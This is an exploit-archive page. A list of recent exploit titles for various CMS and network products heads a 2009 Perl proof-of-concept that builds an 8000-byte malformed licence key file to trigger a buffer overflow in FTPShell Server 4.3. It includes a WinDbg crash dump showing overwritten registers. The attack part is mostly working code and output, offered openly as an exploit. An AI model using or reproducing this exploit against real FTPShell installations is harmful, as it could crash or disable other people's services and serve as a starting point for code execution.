
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
64 lines
2.3 KiB
Perl
Executable file
64 lines
2.3 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# Title: FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC
|
|
#
|
|
# Summary: FTPShell server is a windows FTP service that enables remote file downloads and uploads.
|
|
# It supports regular and secure FTP based on both SSL/TLS and SSH2. It is also extremely easy to
|
|
# configure and use.
|
|
#
|
|
# Product web page: http://www.ftpshell.com/index.htm
|
|
#
|
|
# Desc: FTPShell Server 4.3 suffers from buffer overflow vulnerability that can be exploited remotely or localy.
|
|
# It fails to perform adequate boundry condition of the input .key file, allowing us to overwrite the EAX and EDX
|
|
# registers. When trying to install licence with less than 8000 bytes we get a message: "It appears that your key
|
|
# file is corrupt or invalid.", but when installing a licence with 8000 bytes we get a message: "Your licence key
|
|
# has been succesfully loaded. Please restart the program."
|
|
#
|
|
# Note: When you restart the program, it will always crash untill you repair it or reinstall it.
|
|
#
|
|
#
|
|
# ---------------------------------WinDbg-------------------------------------
|
|
#
|
|
# (1178.1d4): Access violation - code c0000005 (first chance)
|
|
# First chance exceptions are reported before any exception handling.
|
|
# This exception may be expected and handled.
|
|
# eax=41414141 ebx=00b159c0 ecx=00b159c0 edx=41414141 esi=00b1c630 edi=00000005
|
|
# eip=004039a0 esp=0012f3bc ebp=00000000 iopl=0 nv up ei pl nz na pe nc
|
|
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
|
#
|
|
# ftpshelldscp+0x39a0:
|
|
# 004039a0 ff5210 call dword ptr [edx+10h] ds:0023:41414151=????????
|
|
#
|
|
# ----------------------------------------------------------------------------
|
|
#
|
|
#
|
|
# Tested on Microsoft Windows XP Professional SP2 (English)
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
#
|
|
# liquidworm [t00t] gmail [w00t] com
|
|
#
|
|
# http://www.zeroscience.org
|
|
#
|
|
# 22.01.2009
|
|
#
|
|
####################################################################################
|
|
|
|
|
|
$file = "Yes_Man.key";
|
|
|
|
$payload = "\x41" x 8000;
|
|
|
|
print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n";
|
|
|
|
sleep (1);
|
|
|
|
open (key, ">./$file") || die "\nCan't open $file: $!";
|
|
|
|
print key "$payload";
|
|
|
|
close (key);
|
|
|
|
print "\n\n[+] File $file successfully created!\n\n\a";
|
|
|
|
# milw0rm.com [2009-01-22]
|